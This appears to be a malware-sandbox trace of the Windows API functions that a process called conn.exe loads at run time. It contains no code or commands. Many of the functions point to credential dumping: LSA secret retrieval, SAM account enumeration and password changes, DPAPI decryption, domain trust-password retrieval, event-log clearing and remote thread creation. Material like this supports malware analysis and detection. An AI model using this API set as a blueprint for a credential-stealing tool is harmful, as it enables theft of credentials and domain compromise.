- DynamicLoader: kernel32.dll/FreeLibraryWhenCallbackReturns - DynamicLoader: kernel32.dll/GetCurrentProcessorNumber - DynamicLoader: kernel32.dll/CreateSymbolicLinkW - DynamicLoader: kernel32.dll/GetCurrentPackageId - DynamicLoader: kernel32.dll/GetTickCount64 - DynamicLoader: kernel32.dll/GetFileInformationByHandleEx - DynamicLoader: kernel32.dll/SetFileInformationByHandle - DynamicLoader: kernel32.dll/GetSystemTimePreciseAsFileTime - DynamicLoader: kernel32.dll/InitializeConditionVariable - DynamicLoader: kernel32.dll/WakeConditionVariable - DynamicLoader: kernel32.dll/WakeAllConditionVariable - DynamicLoader: kernel32.dll/SleepConditionVariableCS - DynamicLoader: kernel32.dll/InitializeSRWLock - DynamicLoader: kernel32.dll/AcquireSRWLockExclusive - DynamicLoader: kernel32.dll/TryAcquireSRWLockExclusive - DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive - DynamicLoader: kernel32.dll/SleepConditionVariableSRW - DynamicLoader: kernel32.dll/CreateThreadpoolWork - DynamicLoader: kernel32.dll/SubmitThreadpoolWork - DynamicLoader: kernel32.dll/CloseThreadpoolWork - DynamicLoader: kernel32.dll/CompareStringEx - DynamicLoader: kernel32.dll/GetLocaleInfoEx - DynamicLoader: kernel32.dll/LCMapStringEx - DynamicLoader: kernel32.dll/InitializeConditionVariable - DynamicLoader: kernel32.dll/SleepConditionVariableCS - DynamicLoader: kernel32.dll/WakeAllConditionVariable - DynamicLoader: kernel32.dll/AreFileApisANSI - DynamicLoader: kernel32.dll/GetNativeSystemInfo - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW - DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW - DynamicLoader: comctl32.dll/ - DynamicLoader: kernel32.dll/FlsGetValue - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: ADVAPI32.dll/LookupAccountSidW - DynamicLoader: sechost.dll/LookupAccountSidLocalW - DynamicLoader: NETAPI32.DLL/NetStatisticsGet - DynamicLoader: NETAPI32.DLL/NetApiBufferFree - DynamicLoader: ADVAPI32.dll/CryptAcquireContextW - DynamicLoader: ADVAPI32.dll/CryptGenRandom - DynamicLoader: ADVAPI32.dll/CryptReleaseContext - DynamicLoader: CRYPTSP.dll/CryptAcquireContextW - DynamicLoader: CRYPTSP.dll/CryptGenRandom - DynamicLoader: CRYPTSP.dll/CryptReleaseContext - DynamicLoader: conn.exe/_OPENSSL_isservice - DynamicLoader: USER32.dll/GetForegroundWindow - DynamicLoader: USER32.dll/GetCursorInfo - DynamicLoader: USER32.dll/GetQueueStatus - DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot - DynamicLoader: kernel32.dll/CloseToolhelp32Snapshot - DynamicLoader: kernel32.dll/Heap32First - DynamicLoader: kernel32.dll/Heap32Next - DynamicLoader: kernel32.dll/Heap32ListFirst - DynamicLoader: kernel32.dll/Heap32ListNext - DynamicLoader: kernel32.dll/Process32First - DynamicLoader: kernel32.dll/Process32Next - DynamicLoader: kernel32.dll/Thread32First - DynamicLoader: kernel32.dll/Thread32Next - DynamicLoader: kernel32.dll/Module32First - DynamicLoader: kernel32.dll/Module32Next - DynamicLoader: NETAPI32.DLL/NetStatisticsGet - DynamicLoader: NETAPI32.DLL/NetApiBufferFree

Date: 2020-02-15 01:57:34


- DynamicLoader: ADVAPI32.dll/CryptAcquireContextW - DynamicLoader: ADVAPI32.dll/CryptGenRandom - DynamicLoader: ADVAPI32.dll/CryptReleaseContext - DynamicLoader: USER32.dll/GetForegroundWindow - DynamicLoader: USER32.dll/GetCursorInfo - DynamicLoader: USER32.dll/GetQueueStatus - DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot - DynamicLoader: kernel32.dll/CloseToolhelp32Snapshot - DynamicLoader: kernel32.dll/Heap32First - DynamicLoader: kernel32.dll/Heap32Next - DynamicLoader: kernel32.dll/Heap32ListFirst - DynamicLoader: kernel32.dll/Heap32ListNext - DynamicLoader: kernel32.dll/Process32First - DynamicLoader: kernel32.dll/Process32Next - DynamicLoader: kernel32.dll/Thread32First - DynamicLoader: kernel32.dll/Thread32Next - DynamicLoader: kernel32.dll/Module32First - DynamicLoader: kernel32.dll/Module32Next - DynamicLoader: api-ms-win-core-synch-l1-2-0.DLL/InitializeCriticalSectionEx - DynamicLoader: kernel32.dll/FlsAlloc - DynamicLoader: kernel32.dll/FlsSetValue - DynamicLoader: api-ms-win-core-synch-l1-2-0.DLL/InitializeCriticalSectionEx - DynamicLoader: kernel32.dll/FlsAlloc - DynamicLoader: kernel32.dll/FlsGetValue - DynamicLoader: kernel32.dll/FlsSetValue - DynamicLoader: kernel32.dll/LCMapStringEx - DynamicLoader: ADVAPI32.dll/CryptReleaseContext - DynamicLoader: ADVAPI32.dll/CryptGenKey - DynamicLoader: ADVAPI32.dll/CryptGetProvParam - DynamicLoader: ADVAPI32.dll/CryptGetHashParam - DynamicLoader: ADVAPI32.dll/CryptImportKey - DynamicLoader: ADVAPI32.dll/CryptSetKeyParam - DynamicLoader: ADVAPI32.dll/CryptDestroyHash - DynamicLoader: ADVAPI32.dll/CryptSetHashParam - DynamicLoader: ADVAPI32.dll/CryptHashData - DynamicLoader: ADVAPI32.dll/CryptCreateHash - DynamicLoader: ADVAPI32.dll/CryptExportKey - DynamicLoader: ADVAPI32.dll/CryptDecrypt - DynamicLoader: ADVAPI32.dll/SystemFunction007 - DynamicLoader: ADVAPI32.dll/CryptDuplicateKey - DynamicLoader: ADVAPI32.dll/CryptEncrypt - DynamicLoader: ADVAPI32.dll/CryptAcquireContextW - DynamicLoader: ADVAPI32.dll/CryptGetKeyParam - DynamicLoader: ADVAPI32.dll/CryptAcquireContextA - DynamicLoader: ADVAPI32.dll/CryptDestroyKey - DynamicLoader: ADVAPI32.dll/GetLengthSid - DynamicLoader: ADVAPI32.dll/CopySid - DynamicLoader: ADVAPI32.dll/LsaClose - DynamicLoader: ADVAPI32.dll/LsaOpenPolicy - DynamicLoader: ADVAPI32.dll/LsaQueryInformationPolicy - DynamicLoader: ADVAPI32.dll/CreateWellKnownSid - DynamicLoader: ADVAPI32.dll/CreateProcessAsUserW - DynamicLoader: ADVAPI32.dll/CreateProcessWithLogonW - DynamicLoader: ADVAPI32.dll/RegQueryValueExW - DynamicLoader: ADVAPI32.dll/RegEnumValueW - DynamicLoader: ADVAPI32.dll/RegOpenKeyExW - DynamicLoader: ADVAPI32.dll/RegSetValueExW - DynamicLoader: ADVAPI32.dll/RegEnumKeyExW - DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW - DynamicLoader: ADVAPI32.dll/RegCloseKey - DynamicLoader: ADVAPI32.dll/SystemFunction032 - DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW - DynamicLoader: ADVAPI32.dll/QueryServiceObjectSecurity

Date: 2020-02-15 01:57:34


- DynamicLoader: ADVAPI32.dll/QueryServiceStatusEx - DynamicLoader: ADVAPI32.dll/BuildSecurityDescriptorW - DynamicLoader: ADVAPI32.dll/OpenServiceW - DynamicLoader: ADVAPI32.dll/StartServiceW - DynamicLoader: ADVAPI32.dll/FreeSid - DynamicLoader: ADVAPI32.dll/ControlService - DynamicLoader: ADVAPI32.dll/SetServiceObjectSecurity - DynamicLoader: ADVAPI32.dll/DeleteService - DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid - DynamicLoader: ADVAPI32.dll/OpenSCManagerW - DynamicLoader: ADVAPI32.dll/CloseServiceHandle - DynamicLoader: ADVAPI32.dll/CreateServiceW - DynamicLoader: ADVAPI32.dll/IsTextUnicode - DynamicLoader: ADVAPI32.dll/GetTokenInformation - DynamicLoader: ADVAPI32.dll/LookupAccountNameW - DynamicLoader: ADVAPI32.dll/LookupAccountSidW - DynamicLoader: ADVAPI32.dll/DuplicateTokenEx - DynamicLoader: ADVAPI32.dll/CheckTokenMembership - DynamicLoader: ADVAPI32.dll/OpenProcessToken - DynamicLoader: ADVAPI32.dll/CryptEnumProvidersW - DynamicLoader: ADVAPI32.dll/ConvertStringSidToSidW - DynamicLoader: ADVAPI32.dll/LsaFreeMemory - DynamicLoader: ADVAPI32.dll/SystemFunction006 - DynamicLoader: ADVAPI32.dll/CryptEnumProviderTypesW - DynamicLoader: ADVAPI32.dll/CryptSetProvParam - DynamicLoader: ADVAPI32.dll/CryptGetUserKey - DynamicLoader: ADVAPI32.dll/OpenEventLogW - DynamicLoader: ADVAPI32.dll/ClearEventLogW - DynamicLoader: ADVAPI32.dll/GetNumberOfEventLogRecords - DynamicLoader: ADVAPI32.dll/CryptSignHashW - DynamicLoader: ADVAPI32.dll/LsaRetrievePrivateData - DynamicLoader: ADVAPI32.dll/LsaOpenSecret - DynamicLoader: ADVAPI32.dll/LsaQueryTrustedDomainInfoByName - DynamicLoader: ADVAPI32.dll/CryptDeriveKey - DynamicLoader: ADVAPI32.dll/LsaQuerySecret - DynamicLoader: ADVAPI32.dll/SystemFunction001 - DynamicLoader: ADVAPI32.dll/SystemFunction005 - DynamicLoader: ADVAPI32.dll/SystemFunction013 - DynamicLoader: ADVAPI32.dll/LsaEnumerateTrustedDomainsEx - DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW - DynamicLoader: ADVAPI32.dll/StartServiceCtrlDispatcherW - DynamicLoader: ADVAPI32.dll/RegisterServiceCtrlHandlerW - DynamicLoader: ADVAPI32.dll/SetServiceStatus - DynamicLoader: ADVAPI32.dll/IsValidSid - DynamicLoader: ADVAPI32.dll/OpenThreadToken - DynamicLoader: ADVAPI32.dll/SetThreadToken - DynamicLoader: ADVAPI32.dll/LookupPrivilegeNameW - DynamicLoader: ADVAPI32.dll/CredFree - DynamicLoader: ADVAPI32.dll/CredEnumerateW - DynamicLoader: ADVAPI32.dll/SystemFunction025 - DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW - DynamicLoader: ADVAPI32.dll/GetSidSubAuthority - DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount - DynamicLoader: ADVAPI32.dll/SystemFunction024 - DynamicLoader: Cabinet.dll/ - DynamicLoader: Cabinet.dll/ - DynamicLoader: Cabinet.dll/ - DynamicLoader: Cabinet.dll/ - DynamicLoader: CRYPT32.dll/CertAddCertificateContextToStore - DynamicLoader: CRYPT32.dll/CertGetCertificateContextProperty - DynamicLoader: CRYPT32.dll/CertGetNameStringW - DynamicLoader: CRYPT32.dll/CertFindCertificateInStore - DynamicLoader: CRYPT32.dll/CryptEncodeObject

Date: 2020-02-15 01:57:34


- DynamicLoader: CRYPT32.dll/CertAddEncodedCertificateToStore - DynamicLoader: CRYPT32.dll/CertFreeCertificateContext - DynamicLoader: CRYPT32.dll/CertCloseStore - DynamicLoader: CRYPT32.dll/PFXExportCertStoreEx - DynamicLoader: CRYPT32.dll/CertSetCertificateContextProperty - DynamicLoader: CRYPT32.dll/CertOpenStore - DynamicLoader: CRYPT32.dll/CryptUnprotectData - DynamicLoader: CRYPT32.dll/CryptBinaryToStringW - DynamicLoader: CRYPT32.dll/CryptStringToBinaryW - DynamicLoader: CRYPT32.dll/CryptProtectData - DynamicLoader: CRYPT32.dll/CryptAcquireCertificatePrivateKey - DynamicLoader: CRYPT32.dll/CryptExportPublicKeyInfo - DynamicLoader: CRYPT32.dll/CertEnumSystemStore - DynamicLoader: CRYPT32.dll/CertNameToStrW - DynamicLoader: CRYPT32.dll/CryptSignAndEncodeCertificate - DynamicLoader: CRYPT32.dll/CertEnumCertificatesInStore - DynamicLoader: cryptdll.dll/CDLocateCSystem - DynamicLoader: cryptdll.dll/MD5Update - DynamicLoader: cryptdll.dll/MD5Init - DynamicLoader: cryptdll.dll/CDLocateCheckSum - DynamicLoader: cryptdll.dll/CDGenerateRandomBits - DynamicLoader: cryptdll.dll/MD5Final - DynamicLoader: FLTLIB.DLL/FilterFindNext - DynamicLoader: FLTLIB.DLL/FilterFindFirst - DynamicLoader: NETAPI32.dll/NetRemoteTOD - DynamicLoader: NETAPI32.dll/DsGetDcNameW - DynamicLoader: NETAPI32.dll/NetApiBufferFree - DynamicLoader: NETAPI32.dll/NetWkstaUserEnum - DynamicLoader: NETAPI32.dll/NetShareEnum - DynamicLoader: NETAPI32.dll/NetStatisticsGet - DynamicLoader: NETAPI32.dll/NetSessionEnum - DynamicLoader: NETAPI32.dll/NetServerGetInfo - DynamicLoader: ole32.dll/CoInitializeEx - DynamicLoader: ole32.dll/CoUninitialize - DynamicLoader: ole32.dll/CoCreateInstance - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: RPCRT4.dll/RpcEpUnregister - DynamicLoader: RPCRT4.dll/RpcBindingInqAuthClientW - DynamicLoader: RPCRT4.dll/RpcBindingSetOption - DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW - DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW - DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW - DynamicLoader: RPCRT4.dll/RpcStringFreeW - DynamicLoader: RPCRT4.dll/MesHandleFree - DynamicLoader: RPCRT4.dll/RpcImpersonateClient - DynamicLoader: RPCRT4.dll/RpcRevertToSelf - DynamicLoader: RPCRT4.dll/MesEncodeIncrementalHandleCreate - DynamicLoader: RPCRT4.dll/MesDecodeIncrementalHandleCreate - DynamicLoader: RPCRT4.dll/RpcBindingFree - DynamicLoader: RPCRT4.dll/MesIncrementalHandleReset - DynamicLoader: RPCRT4.dll/NdrMesTypeEncode2 - DynamicLoader: RPCRT4.dll/NdrMesTypeDecode2 - DynamicLoader: RPCRT4.dll/NdrMesTypeFree2 - DynamicLoader: RPCRT4.dll/NdrMesTypeAlignSize2 - DynamicLoader: RPCRT4.dll/RpcBindingVectorFree - DynamicLoader: RPCRT4.dll/RpcServerUseProtseqEpW - DynamicLoader: RPCRT4.dll/RpcServerUnregisterIfEx - DynamicLoader: RPCRT4.dll/RpcBindingToStringBindingW - DynamicLoader: RPCRT4.dll/UuidToStringW - DynamicLoader: RPCRT4.dll/RpcServerRegisterIf2 - DynamicLoader: RPCRT4.dll/RpcMgmtWaitServerListen

Date: 2020-02-15 01:57:34


- DynamicLoader: RPCRT4.dll/RpcServerListen - DynamicLoader: RPCRT4.dll/RpcServerRegisterAuthInfoW - DynamicLoader: RPCRT4.dll/I_RpcGetCurrentCallHandle - DynamicLoader: RPCRT4.dll/RpcEpRegisterW - DynamicLoader: RPCRT4.dll/RpcServerInqBindings - DynamicLoader: RPCRT4.dll/RpcMgmtStopServerListening - DynamicLoader: RPCRT4.dll/I_RpcBindingInqSecurityContext - DynamicLoader: RPCRT4.dll/NdrClientCall2 - DynamicLoader: RPCRT4.dll/NdrServerCall2 - DynamicLoader: RPCRT4.dll/UuidCreate - DynamicLoader: RPCRT4.dll/RpcMgmtEpEltInqBegin - DynamicLoader: RPCRT4.dll/RpcMgmtEpEltInqDone - DynamicLoader: RPCRT4.dll/RpcMgmtEpEltInqNextW - DynamicLoader: RPCRT4.dll/RpcEpResolveBinding - DynamicLoader: SHLWAPI.dll/PathIsDirectoryW - DynamicLoader: SHLWAPI.dll/PathFindFileNameW - DynamicLoader: SHLWAPI.dll/PathIsRelativeW - DynamicLoader: SHLWAPI.dll/PathCanonicalizeW - DynamicLoader: SHLWAPI.dll/PathCombineW - DynamicLoader: SAMLIB.dll/SamLookupIdsInDomain - DynamicLoader: SAMLIB.dll/SamGetMembersInGroup - DynamicLoader: SAMLIB.dll/SamEnumerateGroupsInDomain - DynamicLoader: SAMLIB.dll/SamGetAliasMembership - DynamicLoader: SAMLIB.dll/SamOpenAlias - DynamicLoader: SAMLIB.dll/SamRidToSid - DynamicLoader: SAMLIB.dll/SamEnumerateUsersInDomain - DynamicLoader: SAMLIB.dll/SamLookupNamesInDomain - DynamicLoader: SAMLIB.dll/SamOpenDomain - DynamicLoader: SAMLIB.dll/SamEnumerateDomainsInSamServer - DynamicLoader: SAMLIB.dll/SamOpenUser - DynamicLoader: SAMLIB.dll/SamiChangePasswordUser - DynamicLoader: SAMLIB.dll/SamGetGroupsForUser - DynamicLoader: SAMLIB.dll/SamConnect - DynamicLoader: SAMLIB.dll/SamCloseHandle - DynamicLoader: SAMLIB.dll/SamLookupDomainInSamServer - DynamicLoader: SAMLIB.dll/SamFreeMemory - DynamicLoader: SAMLIB.dll/SamQueryInformationUser - DynamicLoader: SAMLIB.dll/SamSetInformationUser - DynamicLoader: SAMLIB.dll/SamOpenGroup - DynamicLoader: SAMLIB.dll/SamEnumerateAliasesInDomain - DynamicLoader: SAMLIB.dll/SamGetMembersInAlias - DynamicLoader: Secur32.dll/LsaConnectUntrusted - DynamicLoader: Secur32.dll/QueryContextAttributesW - DynamicLoader: Secur32.dll/FreeContextBuffer - DynamicLoader: Secur32.dll/LsaCallAuthenticationPackage - DynamicLoader: Secur32.dll/LsaDeregisterLogonProcess - DynamicLoader: Secur32.dll/LsaLookupAuthenticationPackage - DynamicLoader: Secur32.dll/LsaFreeReturnBuffer - DynamicLoader: SHELL32.dll/CommandLineToArgvW - DynamicLoader: USER32.dll/UnregisterClassW - DynamicLoader: USER32.dll/RegisterClassExW - DynamicLoader: USER32.dll/IsCharAlphaNumericW - DynamicLoader: USER32.dll/GetKeyboardLayout - DynamicLoader: USER32.dll/GetClipboardSequenceNumber - DynamicLoader: USER32.dll/GetClipboardData - DynamicLoader: USER32.dll/TranslateMessage - DynamicLoader: USER32.dll/OpenClipboard - DynamicLoader: USER32.dll/DispatchMessageW - DynamicLoader: USER32.dll/ChangeClipboardChain - DynamicLoader: USER32.dll/CloseClipboard - DynamicLoader: USER32.dll/DestroyWindow - DynamicLoader: USER32.dll/SendMessageW - DynamicLoader: USER32.dll/CreateWindowExW

Date: 2020-02-15 01:57:34


- DynamicLoader: USER32.dll/SetClipboardViewer - DynamicLoader: USER32.dll/PostMessageW - DynamicLoader: USER32.dll/DefWindowProcW - DynamicLoader: USER32.dll/GetMessageW - DynamicLoader: USER32.dll/EnumClipboardFormats - DynamicLoader: USERENV.dll/CreateEnvironmentBlock - DynamicLoader: USERENV.dll/DestroyEnvironmentBlock - DynamicLoader: VERSION.dll/VerQueryValueW - DynamicLoader: VERSION.dll/GetFileVersionInfoW - DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW - DynamicLoader: HID.DLL/HidD_GetHidGuid - DynamicLoader: HID.DLL/HidD_FreePreparsedData - DynamicLoader: HID.DLL/HidD_GetPreparsedData - DynamicLoader: HID.DLL/HidP_GetCaps - DynamicLoader: HID.DLL/HidD_GetAttributes - DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsW - DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList - DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInterfaces - DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceInterfaceDetailW - DynamicLoader: WinSCard.dll/SCardControl - DynamicLoader: WinSCard.dll/SCardConnectW - DynamicLoader: WinSCard.dll/SCardFreeMemory - DynamicLoader: WinSCard.dll/SCardGetAttrib - DynamicLoader: WinSCard.dll/SCardDisconnect - DynamicLoader: WinSCard.dll/SCardEstablishContext - DynamicLoader: WinSCard.dll/SCardReleaseContext - DynamicLoader: WinSCard.dll/SCardListCardsW - DynamicLoader: WinSCard.dll/SCardGetCardTypeProviderNameW - DynamicLoader: WinSCard.dll/SCardListReadersW - DynamicLoader: WINSTA.dll/WinStationConnectW - DynamicLoader: WINSTA.dll/WinStationFreeMemory - DynamicLoader: WINSTA.dll/WinStationCloseServer - DynamicLoader: WINSTA.dll/WinStationQueryInformationW - DynamicLoader: WINSTA.dll/WinStationOpenServerW - DynamicLoader: WINSTA.dll/WinStationEnumerateW - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/

Date: 2020-02-15 01:57:34


- DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: ADVAPI32.dll/A_SHAUpdate - DynamicLoader: ADVAPI32.dll/A_SHAFinal - DynamicLoader: ADVAPI32.dll/A_SHAInit - DynamicLoader: MSASN1.dll/ASN1_CloseEncoder - DynamicLoader: MSASN1.dll/ASN1BERDotVal2Eoid - DynamicLoader: MSASN1.dll/ASN1_FreeEncoded - DynamicLoader: MSASN1.dll/ASN1_CreateEncoder - DynamicLoader: MSASN1.dll/ASN1_CloseModule - DynamicLoader: MSASN1.dll/ASN1_CreateDecoder - DynamicLoader: MSASN1.dll/ASN1_CloseDecoder - DynamicLoader: MSASN1.dll/ASN1_CreateModule - DynamicLoader: ntdll.dll/RtlDowncaseUnicodeString - DynamicLoader: ntdll.dll/RtlFreeUnicodeString - DynamicLoader: ntdll.dll/RtlUnicodeStringToAnsiString - DynamicLoader: ntdll.dll/RtlCompressBuffer - DynamicLoader: ntdll.dll/NtQuerySystemInformation - DynamicLoader: ntdll.dll/NtQuerySystemEnvironmentValueEx - DynamicLoader: ntdll.dll/NtQueryInformationProcess - DynamicLoader: ntdll.dll/RtlGetCurrentPeb - DynamicLoader: ntdll.dll/RtlCreateUserThread - DynamicLoader: ntdll.dll/RtlGUIDFromString - DynamicLoader: ntdll.dll/RtlStringFromGUID - DynamicLoader: ntdll.dll/RtlEqualUnicodeString - DynamicLoader: ntdll.dll/RtlGetNtVersionNumbers - DynamicLoader: ntdll.dll/RtlEqualString - DynamicLoader: ntdll.dll/RtlAppendUnicodeStringToString - DynamicLoader: ntdll.dll/NtEnumerateSystemEnvironmentValuesEx - DynamicLoader: ntdll.dll/RtlAnsiStringToUnicodeString - DynamicLoader: ntdll.dll/RtlFreeOemString - DynamicLoader: ntdll.dll/RtlUpcaseUnicodeStringToOemString - DynamicLoader: ntdll.dll/NtResumeProcess - DynamicLoader: ntdll.dll/RtlAdjustPrivilege - DynamicLoader: ntdll.dll/NtTerminateProcess - DynamicLoader: ntdll.dll/RtlIpv4AddressToStringW - DynamicLoader: ntdll.dll/RtlIpv6AddressToStringW - DynamicLoader: ntdll.dll/RtlInitUnicodeString - DynamicLoader: ntdll.dll/NtQueryObject - DynamicLoader: ntdll.dll/NtCompareTokens - DynamicLoader: ntdll.dll/RtlGetCompressionWorkSpaceSize - DynamicLoader: ntdll.dll/NtSuspendProcess - DynamicLoader: ntdll.dll/NtSetSystemEnvironmentValueEx - DynamicLoader: ntdll.dll/RtlFreeAnsiString - DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString - DynamicLoader: NETAPI32.dll/I_NetServerAuthenticate2 - DynamicLoader: NETAPI32.dll/I_NetServerReqChallenge - DynamicLoader: NETAPI32.dll/I_NetServerTrustPasswordsGet - DynamicLoader: kernel32.dll/GetCPInfo - DynamicLoader: kernel32.dll/GetEnvironmentStringsW - DynamicLoader: kernel32.dll/IsValidCodePage - DynamicLoader: kernel32.dll/FindFirstFileExW - DynamicLoader: kernel32.dll/GetStringTypeW - DynamicLoader: kernel32.dll/SetStdHandle - DynamicLoader: kernel32.dll/GetConsoleMode - DynamicLoader: kernel32.dll/GetConsoleCP - DynamicLoader: kernel32.dll/LCMapStringW - DynamicLoader: kernel32.dll/CompareStringW - DynamicLoader: kernel32.dll/GetFileType

Date: 2020-02-15 01:57:34


- DynamicLoader: kernel32.dll/GetACP - DynamicLoader: kernel32.dll/GetModuleHandleExW - DynamicLoader: kernel32.dll/TerminateProcess - DynamicLoader: kernel32.dll/GetModuleFileNameW - DynamicLoader: kernel32.dll/GetCommandLineW - DynamicLoader: kernel32.dll/GetCommandLineA - DynamicLoader: kernel32.dll/LoadLibraryExW - DynamicLoader: kernel32.dll/TlsFree - DynamicLoader: kernel32.dll/TlsSetValue - DynamicLoader: kernel32.dll/TlsGetValue - DynamicLoader: kernel32.dll/TlsAlloc - DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount - DynamicLoader: kernel32.dll/RtlUnwindEx - DynamicLoader: kernel32.dll/IsProcessorFeaturePresent - DynamicLoader: kernel32.dll/GetStartupInfoW - DynamicLoader: kernel32.dll/SetUnhandledExceptionFilter - DynamicLoader: kernel32.dll/UnhandledExceptionFilter - DynamicLoader: kernel32.dll/IsDebuggerPresent - DynamicLoader: kernel32.dll/RtlVirtualUnwind - DynamicLoader: kernel32.dll/RtlLookupFunctionEntry - DynamicLoader: kernel32.dll/RtlCaptureContext - DynamicLoader: kernel32.dll/InitializeSListHead - DynamicLoader: kernel32.dll/GetCurrentThreadId - DynamicLoader: kernel32.dll/LoadLibraryExA - DynamicLoader: kernel32.dll/GetProcessId - DynamicLoader: kernel32.dll/GetComputerNameW - DynamicLoader: kernel32.dll/ProcessIdToSessionId - DynamicLoader: kernel32.dll/GetCurrentThread - DynamicLoader: kernel32.dll/SetConsoleCursorPosition - DynamicLoader: kernel32.dll/SetCurrentDirectoryW - DynamicLoader: kernel32.dll/FillConsoleOutputCharacterW - DynamicLoader: kernel32.dll/GetTimeZoneInformation - DynamicLoader: kernel32.dll/GetSystemDirectoryW - DynamicLoader: kernel32.dll/GetStdHandle - DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo - DynamicLoader: kernel32.dll/SetEvent - DynamicLoader: kernel32.dll/CreateEventW - DynamicLoader: kernel32.dll/CreatePipe - DynamicLoader: kernel32.dll/SetHandleInformation - DynamicLoader: kernel32.dll/GetModuleHandleW - DynamicLoader: kernel32.dll/GlobalSize - DynamicLoader: kernel32.dll/FreeLibrary - DynamicLoader: kernel32.dll/GetProcAddress - DynamicLoader: kernel32.dll/LoadLibraryW - DynamicLoader: kernel32.dll/lstrlenA - DynamicLoader: kernel32.dll/ExitProcess - DynamicLoader: kernel32.dll/RaiseException - DynamicLoader: kernel32.dll/SetConsoleCtrlHandler - DynamicLoader: kernel32.dll/GetTickCount - DynamicLoader: kernel32.dll/QueryPerformanceCounter - DynamicLoader: kernel32.dll/FormatMessageA - DynamicLoader: kernel32.dll/GetSystemTime - DynamicLoader: kernel32.dll/GetProcessHeap - DynamicLoader: kernel32.dll/GetCurrentProcessId - DynamicLoader: kernel32.dll/DeleteCriticalSection - DynamicLoader: kernel32.dll/GetFileSize - DynamicLoader: kernel32.dll/LockFileEx - DynamicLoader: kernel32.dll/CreateFileMappingA - DynamicLoader: kernel32.dll/UnlockFile - DynamicLoader: kernel32.dll/HeapDestroy - DynamicLoader: kernel32.dll/HeapCompact - DynamicLoader: kernel32.dll/HeapAlloc - DynamicLoader: kernel32.dll/GetSystemInfo

Date: 2020-02-15 01:57:34


- DynamicLoader: kernel32.dll/HeapReAlloc - DynamicLoader: kernel32.dll/DeleteFileW - DynamicLoader: kernel32.dll/GetVersionExA - DynamicLoader: kernel32.dll/WaitForSingleObjectEx - DynamicLoader: kernel32.dll/FlushViewOfFile - DynamicLoader: kernel32.dll/OutputDebugStringW - DynamicLoader: kernel32.dll/GetFileAttributesExW - DynamicLoader: kernel32.dll/GetFileAttributesA - DynamicLoader: kernel32.dll/GetDiskFreeSpaceA - DynamicLoader: kernel32.dll/FormatMessageW - DynamicLoader: kernel32.dll/MultiByteToWideChar - DynamicLoader: kernel32.dll/HeapSize - DynamicLoader: kernel32.dll/HeapValidate - DynamicLoader: kernel32.dll/GetVersionExW - DynamicLoader: kernel32.dll/CreateMutexW - DynamicLoader: kernel32.dll/GetTempPathW - DynamicLoader: kernel32.dll/UnlockFileEx - DynamicLoader: kernel32.dll/SetEndOfFile - DynamicLoader: kernel32.dll/GetFullPathNameA - DynamicLoader: kernel32.dll/InitializeCriticalSection - DynamicLoader: kernel32.dll/LeaveCriticalSection - DynamicLoader: kernel32.dll/LockFile - DynamicLoader: kernel32.dll/OutputDebugStringA - DynamicLoader: kernel32.dll/GetDiskFreeSpaceW - DynamicLoader: kernel32.dll/GetFullPathNameW - DynamicLoader: kernel32.dll/EnterCriticalSection - DynamicLoader: kernel32.dll/HeapFree - DynamicLoader: kernel32.dll/HeapCreate - DynamicLoader: kernel32.dll/TryEnterCriticalSection - DynamicLoader: kernel32.dll/AreFileApisANSI - DynamicLoader: kernel32.dll/GetDateFormatW - DynamicLoader: kernel32.dll/GetSystemTimeAsFileTime - DynamicLoader: kernel32.dll/WideCharToMultiByte - DynamicLoader: kernel32.dll/SystemTimeToFileTime - DynamicLoader: kernel32.dll/GetTimeFormatW - DynamicLoader: kernel32.dll/lstrlenW - DynamicLoader: kernel32.dll/ClearCommError - DynamicLoader: kernel32.dll/PurgeComm - DynamicLoader: kernel32.dll/CreateRemoteThread 